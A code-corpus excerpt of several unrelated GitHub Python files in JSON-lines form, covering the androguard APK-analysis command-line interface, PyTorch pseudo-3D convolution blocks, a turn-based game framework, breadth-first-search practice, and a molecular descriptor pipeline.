androguard.cli import (androarsc_main,\n androaxml_main,\n androcg_main,\n export_apps_to_format,\n androsign_main,\n androlyze_main,\n androgui_main,\n androdis_main\n )\n\n\n@click.group(help=__doc__)\n@click.version_option(version=androguard.__version__)\n@click.option(\"--verbose\", \"--debug\", 'verbosity', flag_value='verbose', help=\"Print more\")\n@click.option(\"--quiet\", 'verbosity', 
flag_value='quiet', help=\"Print less (only warnings and above)\")\n@click.option(\"--silent\", 'verbosity', flag_value='silent', help=\"Print no log messages\")\ndef entry_point(verbosity):\n level = logging.INFO\n\n if verbosity == 'verbose':\n level = logging.DEBUG\n if verbosity == 'quiet':\n level = logging.WARNING\n\n # If something out of this module is imported, activate console logging\n if verbosity != 'silent':\n show_logging(level=level)\n\n\n@entry_point.command()\n@click.option(\n '--input', '-i', 'input_',\n type=click.Path(exists=True),\n help='AndroidManifest.xml or APK to parse (legacy option)',\n)\n@click.option(\n '--output', '-o',\n help='filename to save the decoded AndroidManifest.xml to, default stdout',\n)\n@click.option(\"--resource\", \"-r\",\n help=\"Resource inside the APK to parse instead of AndroidManifest.xml\"\n)\n@click.argument(\n 'file_',\n type=click.Path(exists=True),\n # help='AndroidManifest.xml or APK to parse',\n required=False,\n)\ndef axml(input_, output, file_, resource):\n \"\"\"\n Parse the AndroidManifest.xml.\n\n Parsing is either direct or from a given APK and prints in XML format or\n saves to file.\n\n This tool can also be used to process any AXML encoded file, for example\n from the layout directory.\n\n Example:\n\n \\b\n $ androguard axml AndroidManifest.xml\n \"\"\"\n if file_ is not None and input_ is not None:\n print(\"Can not give --input and positional argument! \"\n \"Please use only one of them!\")\n sys.exit(1)\n\n if file_ is None and input_ is None:\n print(\"Give one file to decode!\")\n sys.exit(1)\n\n if file_ is not None:\n androaxml_main(file_, output, resource)\n elif input_ is not None:\n androaxml_main(input_, output, resource)\n\n\n@entry_point.command()\n@click.option(\n '--input', '-i', 'input_',\n type=click.Path(exists=True),\n help='resources.arsc or APK to parse (legacy option)',\n)\n@click.argument(\n 'file_',\n # help='resources.arsc or APK to parse',\n required=False,\n)\n@click.option(\n '--output', '-o',\n # required=True, # not required due to --list-types\n help='filename to save the decoded resources to',\n)\n@click.option(\n '--package', '-p',\n help='Show only resources for the given package name '\n '(default: the first package name found)',\n)\n@click.option(\n '--locale', '-l',\n help='Show only resources for the given locale (default: \\'\\\\x00\\\\x00\\')',\n)\n@click.option(\n '--type', '-t', 'type_',\n help='Show only resources of the given type (default: public)',\n)\n@click.option(\n '--id', 'id_',\n help=\"Resolve the given ID for the given locale and package. Provide the hex ID!\"\n)\n@click.option(\n '--list-packages', '-t', is_flag=True,\n default=False,\n help='List all package names and exit',\n)\n@click.option(\n '--list-locales', '-t', is_flag=True,\n default=False,\n help='List all package names and exit',\n)\n@click.option(\n '--list-types', '-t', is_flag=True,\n default=False,\n help='List all types and exit',\n)\ndef arsc(input_,\n file_,\n output,\n package,\n locale,\n type_,\n id_,\n list_packages,\n list_locales,\n list_types):\n \"\"\"\n Decode resources.arsc either directly from a given file or from an APK.\n\n Example:\n\n \\b\n $ androguard arsc app.apk\n \"\"\"\n from androguard.core import androconf\n from androguard.core.bytecodes import apk\n\n if file_ and input_:\n print(\"Can not give --input and positional argument! 
\"\n \"Please use only one of them!\",\n file=sys.stderr)\n sys.exit(1)\n\n if not input_ and not file_:\n print(\"Give one file to decode!\", file=sys.stderr)\n sys.exit(1)\n\n if input_:\n fname = input_\n else:\n fname = file_\n\n ret_type = androconf.is_android(fname)\n if ret_type == \"APK\":\n a = apk.APK(fname)\n arscobj = a.get_android_resources()\n if not arscobj:\n print(\"The APK does not contain a resources file!\", file=sys.stderr)\n sys.exit(0)\n elif ret_type == \"ARSC\":\n with open(fname, 'rb') as fp:\n arscobj = apk.ARSCParser(fp.read())\n if not arscobj:\n print(\"The resources file seems to be invalid!\", file=sys.stderr)\n sys.exit(1)\n else:\n print(\"Unknown file type!\", file=sys.stderr)\n sys.exit(1)\n\n if id_:\n # Strip the @, if any\n if id_[0] == \"@\":\n id_ = id_[1:]\n try:\n i_id = int(id_, 16)\n except ValueError:\n print(\"ID '{}' could not be parsed! have you supplied the correct hex ID?\".format(id_))\n sys.exit(1)\n\n name = arscobj.get_resource_xml_name(i_id)\n if not name:\n print(\"Specified resource was not found!\")\n sys.exit(1)\n\n print(\"@{:08x} resolves to '{}'\".format(i_id, name))\n print()\n\n # All the information is in the config.\n # we simply need to get the actual value of the entry\n for config, entry in arscobj.get_resolved_res_configs(i_id):\n print(\"{} = '{}'\".format(config.get_qualifier() if not config.is_default() else \"\", entry))\n\n sys.exit(0)\n\n if list_packages:\n print(\"\\n\".join(arscobj.get_packages_names()))\n sys.exit(0)\n\n if list_locales:\n for p in arscobj.get_packages_names():\n print(\"In Package:\", p)\n print(\"\\n\".join(map(lambda x: \" \\\\x00\\\\x00\"\n if x == \"\\x00\\x00\"\n else \" {}\".format(x),\n sorted(arscobj.get_locales(p)))))\n sys.exit(0)\n\n if list_types:\n for p in arscobj.get_packages_names():\n print(\"In Package:\", p)\n for locale in sorted(arscobj.get_locales(p)):\n print(\" In Locale: {}\".format(\"\\\\x00\\\\x00\"\n if locale == \"\\x00\\x00\" else locale))\n print(\"\\n\".join(map(\" {}\".format,\n sorted(arscobj.get_types(p, locale)))))\n sys.exit(0)\n\n androarsc_main(arscobj,\n outp=output,\n package=package,\n typ=type_,\n locale=locale)\n\n\n@entry_point.command()\n@click.option(\n '--output', '-o',\n default=\"callgraph.gml\", show_default=True,\n help='Filename of the output file, the extension is used to decide which '\n 'format to use (default callgraph.gml)',\n)\n@click.option(\n '--show', '-s',\n default=False,\n help='instead of saving the graph, print it with mathplotlib '\n '(you might not see anything!)',\n)\n@click.option(\n '--verbose', '-v', is_flag=True,\n default=False,\n help='Print more output',\n)\n@click.option(\n '--classname',\n default='.*', show_default=True,\n help='Regex to filter by classname',\n)\n@click.option(\n '--methodname',\n default='.*', show_default=True,\n help='Regex to filter by methodname',\n)\n@click.option(\n '--descriptor',\n default='.*', show_default=True,\n help='Regex to filter by descriptor',\n)\n@click.option(\n '--accessflag',\n default='.*', show_default=True,\n help='Regex to filter by accessflags',\n)\n@click.option(\n '--no-isolated/--isolated',\n default=False,\n help='Do not store methods which has no xrefs',\n)\n@click.argument(\n 'APK',\n # help='The APK to analyze',\n nargs=1,\n required=False,\n type=click.Path(exists=True),\n)\ndef cg(output,\n show,\n verbose,\n classname,\n methodname,\n descriptor,\n accessflag,\n no_isolated,\n apk):\n \"\"\"\n Create a call graph and export it into a graph format.\n\n 
Example:\n\n \\b\n $ androguard cg APK\n \"\"\"\n androcg_main(verbose=verbose,\n APK=apk,\n classname=classname,\n methodname=methodname,\n descriptor=descriptor,\n accessflag=accessflag,\n no_isolated=no_isolated,\n show=show,\n output=output)\n\n\n@entry_point.command()\n@click.option(\n '--input', '-i', 'input_',\n type=click.Path(exists=True),\n help='APK to parse (legacy option)',\n)\n@click.argument(\n 'file_',\n type=click.Path(exists=True),\n # help='APK to parse',\n required=False,\n)\n@click.option(\n '--output', '-o',\n required=True,\n help='output directory. If the output folder already exsist, '\n 'it will be overwritten!',\n)\n@click.option(\n '--format', '-f', 'format_',\n help='Additionally write control flow graphs for each method, specify '\n 'the format for example png, jpg, raw (write dot file), ...',\n)\n@click.option(\n '--jar', '-j',\n is_flag=True,\n default=False,\n help='Use DEX2JAR to create a JAR file',\n)\n@click.option(\n '--limit', '-l',\n help='Limit to certain methods only by regex (default: \\'.*\\')',\n)\n@click.option(\n '--decompiler', '-d',\n help='Use a different decompiler (default: DAD)',\n)\ndef decompile(input_, file_, output, format_, jar, limit, decompiler):\n \"\"\"\n Decompile an APK and create Control Flow Graphs.\n\n Example:\n\n \\b\n $ androguard resources.arsc\n \"\"\"\n from androguard import session\n if file_ and input_:\n print(\"Can not give --input and positional argument! \"\n \"Please use only one of them!\", file=sys.stderr)\n sys.exit(1)\n\n if not input_ and not file_:\n print(\"Give one file to decode!\", file=sys.stderr)\n sys.exit(1)\n\n if input_:\n fname = input_\n else:\n fname = file_\n\n s = session.Session()\n with open(fname, \"rb\") as fd:\n s.add(fname, fd.read())\n export_apps_to_format(fname, s, output, limit,\n jar, decompiler, format_)\n\n\n@entry_point.command()\n@click.option(\n '--hash', 'hash_',\n type=click.Choice(['md5', 'sha1', 'sha256', 'sha512']),\n default='sha1', show_default=True,\n help='Fingerprint Hash algorithm',\n)\n@click.option(\n '--all', '-a', 'print_all_hashes',\n is_flag=True,\n default=False, show_default=True,\n help='Print all supported hashes',\n)\n@click.option(\n '--show', '-s',\n is_flag=True,\n default=False, show_default=True,\n help='Additionally of printing the fingerprints, show more '\n 'certificate information',\n)\n@click.argument(\n 'apk',\n # help='APK(s) to extract the Fingerprint of Certificates from',\n nargs=-1,\n required=False,\n type=click.Path(exists=True),\n)\ndef sign(hash_, print_all_hashes, show, apk):\n \"\"\"Return the fingerprint(s) of all certificates inside an APK.\"\"\"\n androsign_main(apk, hash_, print_all_hashes, show)\n\n@entry_point.command()\n@click.argument(\n 'apks',\n nargs=-1,\n required=False,\n type=click.Path(exists=True),\n)\ndef apkid(apks):\n \"\"\"Return the packageName/versionCode/versionName per APK as JSON.\"\"\"\n import json\n import logging\n logging.getLogger(\"androguard.axml\").setLevel(logging.ERROR)\n results = dict()\n for apk in apks:\n results[apk] = androguard.core.bytecodes.apk.get_apkid(apk)\n print(json.dumps(results, indent=2))\n\n\n@entry_point.command()\n@click.option(\n '--input_file', '-i',\n type=click.Path(exists=True),\n)\n@click.option(\n '--input_plugin', '-p',\n type=click.Path(exists=True),\n)\ndef gui(input_file, input_plugin):\n \"\"\"Androguard GUI\"\"\"\n androgui_main(input_file, input_plugin)\n\n\n@entry_point.command()\n@click.option(\n '--session',\n help='Previously saved session to load instead of 
a file',\n type=click.Path(exists=True),\n)\n@click.argument(\n 'apk',\n # help='Start the shell with the given APK. a, d, dx are available then. Loading might be slower in this case!',\n default=None,\n required=False,\n type=click.Path(exists=True),\n)\ndef analyze(session, apk):\n \"\"\"Open a IPython Shell and start reverse engineering.\"\"\"\n androlyze_main(session, apk)\n\n\n@entry_point.command()\n@click.option(\"-o\", \"--offset\",\n default=0,\n type=int,\n help=\"Offset to start dissassembly inside the file\")\n@click.option(\"-s\", \"--size\",\n default=0,\n type=int,\n help=\"Number of bytes from offset to disassemble, 0 for whole file\")\n@click.argument(\"DEX\")\ndef disassemble(offset, size, dex):\n \"\"\"\n Disassemble Dalvik Code with size SIZE starting from an offset\n \"\"\"\n androdis_main(offset, size, dex)\n\n\nif __name__ == '__main__':\n entry_point()\n","repo_name":"amimo/dcc","sub_path":"androguard/cli/entry_points.py","file_name":"entry_points.py","file_ext":"py","file_size_in_byte":13486,"program_lang":"python","lang":"en","doc_type":"code","stars":975,"dataset":"github-code","pt":"21"} +{"seq_id":"21914451236","text":"word_to_find = str(input())\nlines = int(input())\nprints = []\nwhile lines != 0:\n word = str(input())\n word_lst = []\n word_lst.append(word)\n make_char = []\n result = []\n for char in word_to_find:\n make_char.append(char)\n for char in word:\n result.append(char)\n\n if sorted(result) == sorted(make_char):\n prints.append('Yes')\n else:\n prints.append('No')\n\n lines -= 1\n\nprint(*prints, sep = '\\n')","repo_name":"TheFrostKing/Telerik","sub_path":"mock exam 2/word_anagrams.py","file_name":"word_anagrams.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39844291241","text":"from typing import Union, Tuple, Optional\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom einops import rearrange\n\n\nclass ConvPseudo3D(nn.Module):\n def __init__(self,\n in_channels: int,\n out_channels: int,\n kernel_size: Union[Tuple[int, int], int],\n stride: Union[Tuple[int, int], int] = 1,\n padding: Union[Tuple[int, int], int, str] = 'same',\n legacy_v010: bool = True\n ) -> None:\n super().__init__()\n self.spatial_conv = nn.Conv2d(\n in_channels = in_channels,\n out_channels = out_channels,\n kernel_size = kernel_size,\n stride = stride,\n padding = padding\n )\n self.temporal_conv = nn.Conv1d(\n in_channels = out_channels,\n out_channels = out_channels,\n kernel_size = 3 if legacy_v010 else kernel_size,\n padding = 1 if legacy_v010 else 'same'\n )\n # dirac impulse |= conv identity\n nn.init.dirac_(self.temporal_conv.weight.data)\n nn.init.zeros_(self.temporal_conv.bias.data)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n is_video = x.ndim == 5\n if is_video:\n b, c, f, h, w = x.shape\n x = rearrange(x, 'b c f h w -> (b f) c h w')\n x = self.spatial_conv(x)\n if not is_video:\n return x\n else:\n bf, c, h, w = x.shape\n x = rearrange(x, '(b f) c h w -> (b h w) c f', b = b, f = f)\n x = self.temporal_conv(x)\n x = rearrange(x, '(b h w) c f -> b c f h w', h = h, w = w)\n return x\n\n\nclass UpsamplePseudo3D(nn.Module):\n def __init__(self,\n channels: int,\n out_channels: Optional[int] = None):\n super().__init__()\n self.channels = channels\n self.out_channels = out_channels or channels\n self.conv = ConvPseudo3D(\n in_channels = self.channels,\n out_channels = self.out_channels,\n kernel_size = 3,\n padding = 1\n 
)\n\n def forward(self, hidden_states, upsample_size = None):\n # TODO remove once bfloat interpolate on cuda is implemented in torch\n # https://github.com/pytorch/pytorch/issues/86679\n dtype = hidden_states.dtype\n if dtype == torch.bfloat16:\n hidden_states = hidden_states.to(torch.float32)\n is_video = hidden_states.ndim == 5\n if is_video:\n b, *_ = hidden_states.shape\n hidden_states = rearrange(hidden_states, 'b c f h w -> (b f) c h w')\n if hidden_states.shape[0] >= 64:\n hidden_states = hidden_states.contiguous()\n if upsample_size is None:\n hidden_states = F.interpolate(hidden_states, scale_factor = 2.0, mode = 'nearest')\n else:\n hidden_states = F.interpolate(hidden_states, size = upsample_size, mode = 'nearest')\n if dtype == torch.bfloat16:\n hidden_states = hidden_states.to(dtype)\n if is_video:\n hidden_states = rearrange(hidden_states, '(b f) c h w -> b c f h w', b = b)\n hidden_states = self.conv(hidden_states)\n return hidden_states\n\n\nclass DownsamplePseudo3D(nn.Module):\n def __init__(self,\n channels: int,\n out_channels: Optional[int] = None\n ) -> None:\n super().__init__()\n self.channels = channels\n self.out_channels = out_channels or channels\n self.conv = ConvPseudo3D(self.channels, self.out_channels, 3, stride = 2, padding = 1)\n\n def forward(self, hidden_states):\n hidden_states = self.conv(hidden_states)\n return hidden_states\n\n\nclass ResnetBlockPseudo3D(nn.Module):\n def __init__(self,\n *,\n in_channels: int,\n out_channels: Optional[int] = None,\n temb_channels: int = 512,\n dropout: float = 0.0\n ) -> None:\n super().__init__()\n self.in_channels = in_channels\n out_channels = in_channels if out_channels is None else out_channels\n self.out_channels = out_channels\n self.norm1 = torch.nn.GroupNorm(\n num_groups = 32,\n num_channels = in_channels,\n eps = 1e-5,\n affine = True\n )\n self.conv1 = ConvPseudo3D(\n in_channels,\n out_channels,\n kernel_size = 3,\n stride = 1,\n padding = 1\n )\n self.time_emb_proj = torch.nn.Linear(\n temb_channels,\n out_channels\n )\n self.norm2 = torch.nn.GroupNorm(\n num_groups = 32,\n num_channels = out_channels,\n eps = 1e-5,\n affine = True\n )\n self.dropout = torch.nn.Dropout(dropout)\n self.conv2 = ConvPseudo3D(\n out_channels,\n out_channels,\n kernel_size = 3,\n stride = 1,\n padding = 1\n )\n self.nonlinearity = nn.SiLU()\n self.conv_shortcut = ConvPseudo3D(\n in_channels,\n out_channels,\n kernel_size = 1,\n stride = 1,\n padding = 0\n ) if in_channels != out_channels else None\n\n def forward(self,\n input_tensor: torch.Tensor,\n temb: torch.Tensor\n ) -> torch.Tensor:\n hidden_states = input_tensor\n hidden_states = self.norm1(hidden_states)\n hidden_states = self.nonlinearity(hidden_states)\n hidden_states = self.conv1(hidden_states)\n temb = self.nonlinearity(temb)\n temb = self.time_emb_proj(temb)[:, :, None, None]\n is_video = hidden_states.ndim == 5\n if is_video:\n b, c, f, h, w = hidden_states.shape\n hidden_states = rearrange(\n hidden_states,\n 'b c f h w -> (b f) c h w'\n )\n hidden_states = hidden_states + temb.repeat_interleave(f, 0)\n hidden_states = rearrange(\n hidden_states,\n '(b f) c h w -> b c f h w',\n b = b\n )\n else:\n hidden_states = hidden_states + temb\n hidden_states = self.norm2(hidden_states)\n hidden_states = self.nonlinearity(hidden_states)\n hidden_states = self.dropout(hidden_states)\n hidden_states = self.conv2(hidden_states)\n if self.conv_shortcut is not None:\n input_tensor = self.conv_shortcut(input_tensor)\n output_tensor = input_tensor + hidden_states\n return 
output_tensor\n\n","repo_name":"lopho/makeavid-sd-tpu","sub_path":"makeavid_sd/torch_impl/torch_resnet_pseudo3d.py","file_name":"torch_resnet_pseudo3d.py","file_ext":"py","file_size_in_byte":6730,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"21"} +{"seq_id":"32452557","text":"from backend.game.playbox.exceptions.game_over_exception import GameOver\nfrom backend.game.status import Status\n\nclass Game(object):\n def __init__(self, debug_logger, screen, players, environment_manager, turns=99999999, required_players=2, accept_timeouts=False):\n self.screen = screen\n self.debug_logger = debug_logger\n self.turns = turns\n self.required_players = required_players\n self.players = {}\n self.accept_timeouts = accept_timeouts\n self.win_pos = 1\n self.lose_pos = len(players)\n self.environment_manager = environment_manager\n for player in players:\n self.players[player.name] = player\n\n def exit_player(self, player_name):\n self.environment_manager.interact(self.players[player_name].id, '$exit')\n\n def interact(self, player_name):\n message = self.players[player_name].get_data()\n return self.environment_manager.interact(self.players[player_name].id, message)\n\n def queue_command(self, player_name, data):\n self.players[player_name].store_data(data)\n\n def players_win(self, names):\n for name in names:\n self.players[name].position = self.win_pos\n self.players[name].status = Status.WINNER\n self.win_pos += len(names)\n\n def players_lose(self, names):\n for name in names:\n self.players[name].position = self.lose_pos\n self.players[name].status = Status.LOSER\n self.lose_pos -= len(names)\n\n def players_dsq(self, dsq):\n for d in dsq:\n self.players[d[0]].position = len(self.players)\n self.players[d[0]].status = d[1]\n self.lose_pos -= len(dsq)\n for name in self.players:\n if self.players[name].status == Status.LOSER:\n self.players[name].position -= len(dsq)\n\n def start(self):\n pass\n\n def turn(self):\n raise NotImplementedError\n\n def end(self):\n self.screen.close()\n\n def early_game_over(self):\n pass\n\n def check(self):\n players_left = 0\n for player_name in self.players:\n if self.players[player_name].status != Status.PLAYS:\n if self.players[player_name].status == Status.WINNER or \\\n self.players[player_name].status == Status.LOSER or \\\n self.players[player_name].status == Status.DRAW:\n self.exit_player(player_name)\n else:\n self.exit_player(player_name)\n else:\n players_left += 1\n\n if players_left < self.required_players:\n for player_name in self.players:\n if self.players[player_name].status == Status.PLAYS:\n self.players_win([player_name])\n self.exit_player(player_name)\n raise GameOver\n\n def play(self):\n self.start()\n try:\n for turn_no in xrange(self.turns):\n self.turn()\n self.check()\n except GameOver:\n self.early_game_over()\n self.end()\n","repo_name":"tudorvaran/ChallengeBot","sub_path":"backend/game/abstract_game.py","file_name":"abstract_game.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27539582864","text":"def category_display_attributes(thing=None, **kwargs):\n attributes = {\n 'display_context': {\n 'add_tasks': True,\n 'description': True,\n 'prefix': 'Category: ',\n 'url': True,\n 'bread_crumbs': True,\n 'children_attributes': {\n 'choice': {\n 'notation': True,\n },\n },\n },\n }\n if thing:\n attributes['display_context']['extra_action_parameters'] = {\n 'thing': thing,\n }\n 
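Stepping back to the ConvPseudo3D layer defined earlier: because its temporal convolution is dirac/zero initialized, a freshly constructed layer should behave exactly like a per-frame 2D convolution on video input, and that invariant is easy to test. A sketch, assuming the module from the snippet is importable under the path given in its metadata:

import torch
from einops import rearrange
from makeavid_sd.torch_impl.torch_resnet_pseudo3d import ConvPseudo3D  # assumed importable

conv = ConvPseudo3D(in_channels=4, out_channels=8, kernel_size=3, padding=1)
video = torch.randn(2, 4, 5, 16, 16)  # (batch, channels, frames, height, width)

out_video = conv(video)  # spatial conv per frame, then temporal conv

frames = rearrange(video, 'b c f h w -> (b f) c h w')
out_frames = conv.spatial_conv(frames)  # per-frame 2D path only
out_frames = rearrange(out_frames, '(b f) c h w -> b c f h w', b=2)

# dirac-initialized temporal conv acts as identity, so both paths should match
print(torch.allclose(out_video, out_frames, atol=1e-5))  # True at initialization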
return attributes\n\n\ncategories_display_attributes = {\n 'display_context': {\n 'add_tasks': True,\n 'description': True,\n 'prefix': 'Categories: ',\n 'url': True,\n 'bread_crumbs': True,\n 'children_attributes': {\n 'category': {\n 'notation': True,\n },\n },\n }\n}\n\nchoice_display_attributes = {\n 'display_context': {\n 'add_tasks': True,\n 'description': True,\n 'prefix': 'Choice: ',\n 'url': True,\n 'bread_crumbs': True,\n }\n}\n\n\ndef destination_display_attributes(destination_prefix=None, **kwargs):\n return {\n 'display_context': {\n 'add_tasks': True,\n 'description': True,\n 'destination_quantity': True,\n 'prefix': destination_prefix,\n 'url': True,\n 'bread_crumbs': True,\n 'children_attributes': {\n 'destination': {\n 'notation': True,\n 'destination_quantity': True,\n },\n },\n }\n }\n\n\ndef place_display_attributes(place_prefix=None, **kwargs):\n return {\n 'display_context': {\n 'source_quantity': True,\n 'add_tasks': True,\n 'description': True,\n 'prefix': place_prefix,\n 'url': True,\n 'bread_crumbs': True,\n 'children_attributes': {\n 'place': {\n 'notation': True,\n 'source_quantity' : True,\n },\n },\n }\n }\n\n\nthing_display_attributes = {\n 'display_context': {\n 'add_tasks': True,\n 'description': True,\n 'source_quantity': True,\n 'url': True,\n 'bread_crumbs': True,\n 'children_attributes': {\n 'thing': {\n 'notation': True,\n 'thing_quantity': True,\n },\n },\n },\n}\n\ninventory_display_attributes = {\n 'display_context': {\n 'children_attributes': {\n 'inventory': {\n 'notation': True,\n },\n },\n },\n}\n\nperson_display_attributes = {\n 'display_context': {\n 'children_attributes': {\n 'inventory': {\n 'notation': True,\n },\n },\n },\n}\n\nspecification_display_attributes = {\n 'display_context': {\n 'source_quantity': True,\n 'children_attributes': {\n 'inventory': {\n 'notation': True,\n },\n 'category_specification': {\n 'url': True,\n 'notation': True,\n },\n },\n },\n}\n\n\ndef dual_view_childrens_attributes(**kwargs):\n return {\n 'categories': categories_display_attributes,\n 'category': category_display_attributes(**kwargs),\n 'choice': choice_display_attributes,\n 'destination': destination_display_attributes(**kwargs),\n 'inventory': inventory_display_attributes,\n 'place': place_display_attributes(**kwargs),\n 'specification': specification_display_attributes,\n 'thing': thing_display_attributes,\n 'person': person_display_attributes,\n 'people': person_display_attributes,\n }\n","repo_name":"wahinipa/cupboard","sub_path":"www/tracking/contexts/card_display_attributes.py","file_name":"card_display_attributes.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"hi","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42632078123","text":"\nfrom collections import deque\n\n\n# 6-2\n\ngraph = dict()\ngraph['CAB'] = ['CAT', 'CAR']\ngraph['CAT'] = ['MAT', 'BAT']\ngraph['CAR'] = ['CAT', 'BAR']\ngraph['MAT'] = ['BAT']\ngraph['BAR'] = ['BAT']\ngraph['BAT'] = []\n\n\n# (1) 최단경로까지 도달하지만 해당 경로는 출력하지 않음.\n\n# def search(name):\n# q = deque()\n# q += graph[name]\n# searched = []\n# while q:\n# # print(searched)\n# # print(q)\n# node = q.popleft()\n# # print(node)\n# if node not in searched:\n# if node == 'BAT':\n# print('도착 최단 경로 : ')\n# print(node)\n# print()\n# return True\n# else:\n# # q += graph[node]\n# for n in graph[node]:\n# if n not in q and n not in searched:\n# q.append(n)\n# searched.append(node)\n#\n# print('BAT까지 가는 길이 존재하지 않습니다.')\n# return False\n#\n#\n# search('CAB')\n\n\n# (2) 최단 경로를 
출력\n\ndef search2(name):\n q = deque()\n for i in graph[name]:\n q.append([i] + [name])\n searched = []\n while q:\n # print(searched)\n print(q)\n node_list = q.popleft()\n print(node_list)\n node = node_list[0]\n # print(node)\n if node not in searched:\n if node == 'BAT':\n print('도착 최단 경로')\n print(f'경로 :', end=' ')\n [print(f'{i}', end=' ') for i in node_list]\n return True\n else:\n # q += graph[node]\n for n in graph[node]:\n if n not in q and n not in searched:\n node_list2 = [n] + node_list\n q.append(node_list2)\n searched.append(node)\n\n print('BAT까지 가는 길이 존재하지 않습니다.')\n return False\n\n\nsearch2('CAB')\n\n# 6-3\n# 올바른 것 : B\n# 올바르지 않은 것 : A, C\n\n# 6-4\n# 1. 기상\n# 2. 운동\n# 3. 샤워\n# 4. 옷 입기\n# 5. 양치질\n# 6. 아침 식사\n# 7. 점심 도시락 싸기\n\n# 6-5\n# A - O\n# B - X (가장 우측 위로가는 선 때문)\n# C - O\n\n\n# 181126 Result after 1 hour of coding\n\ndef breadth_first_algorithm(name):\n\n q = deque()\n\n # q += graph[name]\n ########################\n path = {}\n for i in graph[name]:\n path[i] = [name, i]\n q.append(i)\n ########################\n\n searched_list = []\n\n while q:\n person = q.popleft()\n\n if person == 'BAT':\n print(path[person])\n return f'\"{person}\" is mango seller!'\n searched_list.append(person)\n\n print(person)\n print(graph[person])\n print(q)\n\n for i in graph[person]:\n if i not in q and i not in searched_list:\n q.append(i)\n print(i)\n ############################\n path[i] = path[person] + [i]\n ############################\n print()\n\n print('There is no mango seller!')\n\n\nprint(breadth_first_algorithm('CAB'))\n","repo_name":"smallbee3/algorithm-study","sub_path":"hellocoding/6_practice.py","file_name":"6_practice.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"37535095536","text":"# coding=utf-8\nimport os\nimport utils\nfrom utils import pro_path\nfrom file_target_helper import *\n\nDEBUG = True\n\n\n# 保留idx对应位置的特征(注意:前两列为smiles、rt, 需要从第3列开始)\ndef handle_by_idx(data, idx):\n new_data = [data[:, 0], data[:, 1]]\n data = data[:, 2:].T\n for i in idx:\n new_data.append(data[i])\n return np.array(new_data).T\n\n\nif __name__ == \"__main__\":\n\n # 1. 读取 pro_path + \"data/input_data/target/\" 文件夹下的所有文件\n file_list = os.listdir(pro_path + \"data/input_data/target/\")\n if DEBUG:\n print(file_list)\n\n # 2. 读取 idx 文件\n idx_graph = utils.read_csv(pro_path + \"data/gen_data/idx_graph.csv\", header=None)[0]\n idx_mordred = utils.read_csv(pro_path + \"data/gen_data/idx_mordred.csv\", header=None)[0]\n\n # 3. 遍历所有文件,并一次处理每个文件\n for file in file_list:\n if len(file.split('.')) == 1: # 说明是文件夹\n continue\n # 前置处理:生成该文件对应的文件夹\n output_path = pro_path + \"data/gen_data/target/\" + file.split('.')[0] + \"/\"\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n print('-' * 20, \"开始处理\", file, '-' * 20)\n print(\"结果保存路径为: \", output_path)\n\n # 4. 获取文件内容\n print(pro_path + \"data/input_data/target/\" + file)\n smiles, rts = utils.read_txt_smiles_rts(pro_path + \"data/input_data/target/\" + file)\n new_smiles, new_rts = [], []\n # 5. 根据 smiles 计算分子 mol\n mols = []\n for i in range(len(smiles)):\n e = smiles[i]\n try:\n mol = Chem.MolFromSmiles(e)\n mol_gnn = Chem.AddHs(Chem.MolFromSmiles(e))\n\n mols.append(mol)\n new_smiles.append(smiles[i])\n new_rts.append(rts[i])\n except:\n if DEBUG:\n print(e, \"无法计算出 mol 或者 mol_gnn\")\n pass\n # 6. 
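Both BFS variants above carry the full path inside every queue entry; the standard refinement is to record each node's parent and rebuild the path only when the goal is reached, which keeps queue entries constant-size. A self-contained sketch over the same word graph:

from collections import deque

graph = {
    'CAB': ['CAT', 'CAR'], 'CAT': ['MAT', 'BAT'], 'CAR': ['CAT', 'BAR'],
    'MAT': ['BAT'], 'BAR': ['BAT'], 'BAT': [],
}

def bfs_path(start, goal):
    parent = {start: None}            # also serves as the visited set
    q = deque([start])
    while q:
        node = q.popleft()
        if node == goal:
            path = []
            while node is not None:   # walk parents back to the start
                path.append(node)
                node = parent[node]
            return path[::-1]
        for nxt in graph[node]:
            if nxt not in parent:
                parent[nxt] = node
                q.append(nxt)
    return None

print(bfs_path('CAB', 'BAT'))  # ['CAB', 'CAT', 'BAT']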
计算 图向量, 并根据 idx_graph 的下标,只保留 idx_graph 中对应的特征\n if DEBUG: print(\"开始计算图向量...\")\n graph_vec = cal_gnn_vec(pro_path, new_smiles, new_rts) # 返回numpy数据,前两列是smiles, rt\n graph_vec = handle_by_idx(graph_vec, idx_graph)\n utils.write_csv(output_path, file.split('.')[0] + \"_graph.csv\", graph_vec)\n if DEBUG:\n print(graph_vec.shape)\n print(\"图向量计算完成...\")\n # 7. 计算 MACCS\n if DEBUG: print(\"开始计��MACCS...\")\n maccs = cal_MACCS(new_smiles, new_rts, mols) # 返回numpy数据,前两列是smiles, rt\n utils.write_csv(output_path, file.split('.')[0] + \"_maccs.csv\", maccs)\n if DEBUG:\n print(maccs.shape)\n print(\"MACCS计算完成...\")\n # 8. 计算 mordred\n if DEBUG: print(\"开始计算mordred...\")\n mordred = cal_mordred(new_smiles, new_rts, mols) # 返回numpy数据,前两列是smiles, rt\n mordred = handle_by_idx(mordred, idx_mordred)\n if DEBUG: print(\"开始填充缺失值...\")\n mordred = fill_mordred(mordred, mols)\n if DEBUG: print(\"缺失值填充完成\")\n utils.write_csv(output_path, file.split('.')[0] + \"_mordred.csv\", mordred)\n if DEBUG:\n print(mordred.shape)\n print(\"mordred计算完成...\")\n # 9. 对 图向量、mordred 中的每个特征进行标准化\n if DEBUG: print(\"开始标准化...\")\n graph_std = standred(graph_vec)\n utils.write_csv(output_path, file.split('.')[0] + \"_graph_std.csv\", graph_std)\n mordred_std = standred(mordred)\n utils.write_csv(output_path, file.split('.')[0] + \"_mordred_std.csv\", 